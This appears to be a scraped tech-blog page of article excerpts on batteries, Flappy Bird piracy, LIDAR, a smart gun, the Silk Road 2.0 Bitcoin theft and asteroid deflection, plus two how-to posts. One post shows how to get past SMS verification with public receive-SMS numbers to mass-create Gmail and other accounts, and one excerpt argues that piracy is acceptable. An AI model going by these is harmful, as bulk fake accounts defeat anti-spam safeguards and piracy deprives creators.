DeSimone and his team still need do more testing to see if the nonflammable electrolyte can withstand the rigors of everyday use, but the research paper puts a pretty positive spin on things: “These electrolytes not only are completely nonflammable, but they also exhibit unprecedented high transference numbers and low electrochemical polarization, indicative of longer battery life.” Moving forward, the team will now begin with the arduous task of bridging the gap between laboratory testing and industrial mass production.

Read More

Flappy Bird’s removal from the app store: A case for piracy

Flappy Bird’s developer, Dong Nguyen, has broken his radio silence to say that he pulled the game for the sake of your well-being. Nguyen said he originally developed the game to help people relax and blow off steam, but instead it became an “addictive product” that caused harm to its players. I guess the game might still return, if Nguyen has a change of heart, but it seems unlikely at this point.

Flappy Bird. Over the last few weeks, this almost insultingly simple Helicopter clone with Mario-like graphics has experienced one of the craziest roller coaster rides in the history of gaming. At the beginning of January, despite the game originally being released way back in mid-2013, no one had even heard of Flappy Bird — and yet, for reasons no one yet understands, when the game peaked at the start of February, it was being downloaded millions of times per day, and accruing the developer, Dong Nguyen, hundreds of thousands of dollars in advertising revenue. If its meteoric rise wasn’t weird enough, though, get this: Yesterday, citing the trials and tribulations that the game had brought him —  ”Please give me peace… I cannot take this anymore… I just cannot keep it anymore” – Nguyen removed Flappy Bird from the iOS and Android app stores. If you already downloaded Flappy Bird, you’re free to keep playing it — but if you’re a late to the party, you’ll sadly never know the frustrajoy of repeatedly bashing your small avian brain into green pipes. Unless, of course, you pirate it.

At the time of writing, there are thousands of people downloading Flappy Bird from The Pirate Bay and other torrent sites, and direct download (DDL) sites are moving a lot of copies as well. Usually, of course, I am against depriving game developers of their income, but Flappy Bird is an odd edge case where piracy may actually be acceptable. At the very least, even if you flat-out disagree with piracy on ideological grounds, read the next few paragraphs — you might be surprised at how they challenge your ideals and worldview. (Read: Why I pirate.)

A case for piracy

Flappy Bird is a free game. It generates revenue by way of ads that pop up when you die. We haven’t exhaustively checked, but the pirated versions of Flappy Bird appear to still have ads. We haven’t confirmed if the ads are still linked to Nguyen’s advertising account, or if the pirates have switched them over to their own accounts. Let’s assume (perhaps a little optimistically) that Google and Apple would crack down on advertising accounts used by pirates, and that the ads are still paying money to Nguyen.

 It’s kind of hard to imagine what it must be like, going from a handful of downloads per day for seven months — the game was originally uploaded to the Android and iOS app stores in May 2013 — to millions of downloads overnight.

Read More

New LIDAR chip will sharpen aerial mapping and autonomous car vision

Handheld laser rangefinders have been available to consumers for years, but increasingly powerful military and industrial versions of the technology are still being developed. A new breed of LIDAR (light detection and ranging) technology is being developed and tested by the US Air Force at a base in Massachusetts. This system is capable of precisely mapping over 300 square kilometers from the belly of an airplane in about half an hour.

While it is considerably more advanced than consumer models, the new Air Force LIDAR works on the same basic principle– laser light is projected toward the target, and a sensor detects the photons upon their return. The time it takes is used to calculate the distance, to varying degrees of accuracy. In advanced systems like those used by the military, LIDAR can create a topographic map of the area it is pointed at.

LIDAR has been used for aerial mapping of disaster areas and remote archaeological sites, but the process has always taken time. After the Haiti earthquake in 2010, a system similar to the one being developed by the Air Force was able to capture a 600 square-meter section of Port-au-Prince at 30cm pixel resolution in a single pass. The chip at the heart of the next generation system is about ten times more powerful.

The Air Force system makes the process a snap by packing an unprecedented number of single-photon pixels detectors into the microchip at the core of the unit. The key to the LIDAR’s incredible speed and resolution is semiconductor technology based on indium gallium arsenide (InGaAs). These III-V semiconductors (so-called because they are made from metals in periodic groups III and V) are seen as a potential replacement for silicon in numerous applications. In this case, InGaAs semiconductors operate in the infrared spectrum, which allows for the use of longer wavelengths of light that can travel farther and scan wider areas.

InGaAsWhile these new systems are still secret, the results from chips of the type used to map Port-au-Prince are beginning to make it into industrial applications. Princeton Lightwave and a division of Boeing have both been working with single-photon InGaAs LIDAR that could one day be incorporated into automated vehicles like Google’s self-driving cars.

Current LIDAR systems are huge and are based on visible light and silicon. That means to see more than a few meters a system would need to be uncomfortably bright. Of course, InGaAs-based LIDAR has to come down in price first — Princeton Lightwave’s current industrial model costs $150,000, but it’s the size of a shoebox.

Princeton Lightwave is already in talks with car manufacturers to build a prototype LIDAR system that could point the way to the future. The military LIDAR capable of mapping cities in mere minutes won’t be much use to consumers, but it might come in handy for the greater good the next time there’s a natural disaster.

Read More

Happiness is a warm iGun: Dumb gun requires smart watch to shoot

Despite Apple’s impending release of a supposed iWatch, the non-phone smart device industry hasn’t yet taken off. Gun company Armatix hopes to take the smart device industry by storm with its new smart gun system.
Armatix iP1 is a .22-caliber hand gun that has something of a symbiotic relationship with a paired smart watch. Thanks to a built-in RFID chip, the watch’s proximity to the gun acts as a safety. If the watch is within a close proximity, the gun will unlock — displaying a green light on the grip — and allow itself to be fired. If the watch isn’t within range, the gun won’t fire. The system is yet another step to make guns safer without making them “safe” by completely removing the public’s right to keep and bear arms.

At the beginning of this year, angel investor Ron Conway — early investor in Google and Facebook — launched a $1 million contest for inventors to create smart gun technology. In a somewhat juicy buzz quote, he said, “We need the iPhone of guns,” referencing the iPhone 5S’ Touch ID sensor. Of course, that kind of technology would ultimately need to be improved, as Apple’s Touch ID is much too finicky for a life and death situation, nor would it help your family member if you’re not around and they need to access the weapon in an emergency without having previously keyed in their biometric data.

Read More

Downloading Torrent Using Internet Download Manager

Torrent is tiny file with .torrent extension which allows you to download huge amount of data. We use torrents to download various stuffs like movies, games, software package and plenty of different things. you'll transfer torrents from several website.  The transfer speed for torrents depends on seeds it has. It will make difficult for you to download files with very low or no seed counts. However with the assistance of this trick you'll be able to download torrent file with IDM. This tool can be really helpfull when you want to download file that has very low seeds. IDM is the quickest file transfer manager on the internet market. So lets begin!

1. First download the torrent file with .torrent extension which you wish to download from the internet directly without any torrent client like utorrent.

2. Now open zbigz.com and you will land on its homepage.
3. Then Click on upload Torrent and browse your torrent to transfer and click on Go.
4. Then it will ask you for Free or Premium service, choose Free to proceed further.
5. It will take some time to cache your file. Once the caching is done, click on transfer button to download your file as shown below.

6. You should have internet download manager installed on your computer so that download start inside IDM. If you don't have IDM don't worry it will download directly.

Note: If you decide on to use Free transfer then you wont be able to transfer file of more then 1 GB 

Read More

How to Bypass Phone and SMS verification of Any Website

Nowadays, Almost most Websites reqired sms verification which includes Google, Facebook, YouTube, Online Shopping Sites and Other Survey Websites.

First of all we should understand why SMS and Phone Verification System is Important?

* Keep More Visitors for Market
* Providing Extra Security for their Website
* Keep Spammers out
* Daily Advertisement and promotional ads daily

Rather we can able to create and Bypass gmail (facebook, youtube, other shopping sites) without SMS verification. Because gmail allow to create only few account. When you try to create more account with same mobile number, google restricted and you can't create more account. so we can create counterless gmail accounts using following steps.

This method is very useful to Bypass SMS verification and useful when you need to Sign up any account and do not feel comfortable to giving your real number or if you want to create multiple account.

Lets Start Step by Step:

1. First go to this Website : Receive-Sms Online
2. Copy any one number and paste it where they are asking SMS Verification.
3. Simply come back and click the number which you have selected, check it out there is your code sent by google, youtube or whatever else.

Read More

Silk Road 2.0 ‘hacked’ for millions, community tearing itself apart.

 
Hackers like to play the cynical, world-weary intellectuals, but an awful lot of them still seem to go down with knives in their backs. More to the point, they often spend brief periods defending those who did the stabbing, refusing to be taken in by “government lies” about divisions in their precious community. The stubborn, almost sentimental refusal to quarantine friends is what felled many important members of Anonymous, and what brought down prominent international criminal organizations like Carders Market. The Deep Web provides a fog of war that can be exploited by anyone — by criminals to operate markets and discussion forums, by police to attack them, and by anyone at all to rob them blind.


Yesterday, one of the operators of the Silk Road posted a long and emotional comment to the dark market’s official forums which laid out the situation: “We have been hacked.” Somewhere between $2.4 and $2.7 million in Bitcoins has disappeared from the Silk Road’s custody thanks to — well, it depends who you believe. Earlier this month, the largest Bitcoin trader Mt. Gox made waves by refusing to continue direct Bitcoin withdrawals due to an alleged “bug” in Bitcoin’s fundamental design. The bug, called transactional malleability, could theoretically allow canny attackers to trick a wallet into thinking that a transaction has been denied, causing the wallet to resend the payment. Using this bug, someone was able to completely empty the Silk Road’s escrow account.

Read More

Defending the Earth from asteroids with high-powered nuclear explosions

 Just over a year ago, the Chelyabinsk meteor entered Earth’s atmosphere, streaked across the southern Urals, and detonated in a fireball that was briefly brighter than the sun. In the wake of that event, governments have paid more attention to an inevitable eventual Earth-asteroid collision. While funding for asteroid detection methods has inched up for several years, the question of how we should deal with species-ending death rocks is still in the theoretical stage.

There are three proposed scenarios for dealing with such an event:

Elect Morgan Freeman as President.
Nudge the rock out of the way using small engines or explosives that apply low amounts of delta-v for a long time.
Aggressively invoke Newton’s Third Law.
Option number three is the one we’ll be discussing today, courtesy of Bong Wie, head of Iowa State University’s asteroid deflection research division. The biggest reason for focusing efforts on short-notice methods of destroying asteroids is simple: we’re not very good at seeing them coming. Asteroids aren’t very reflective, they’re often in erratic orbits, and they have a disconcerting habit of sneaking up on us and only being detected days before they pass near the Earth. The Chelyabinsk asteroid wasn’t detected until it lit up the sky.

Bong Wie’s team is working on a device that would solve the asteroid problem through the targeted application of thermonuclear weapons. He has proposed the creation of a Hypervelocity Asteroid Intercept Vehicle (HAIV). The best way to think of it is like a high-velocity ultra-dense tank shell towing a nuclear weapon attached to a camera. The idea is simple: the high-density slug punches a crater into the rock face which becomes a focusing point for the nuclear detonation arriving just milliseconds later. Using a crater to focus the blast impact increases the total energy released into the rock and gives the bomb a greater chance of altering the trajectory of the asteroid. According to Wie’s calculations, blowing an impact crater before bomb detonation increases the overall destructive power by a factor of 20.

Read More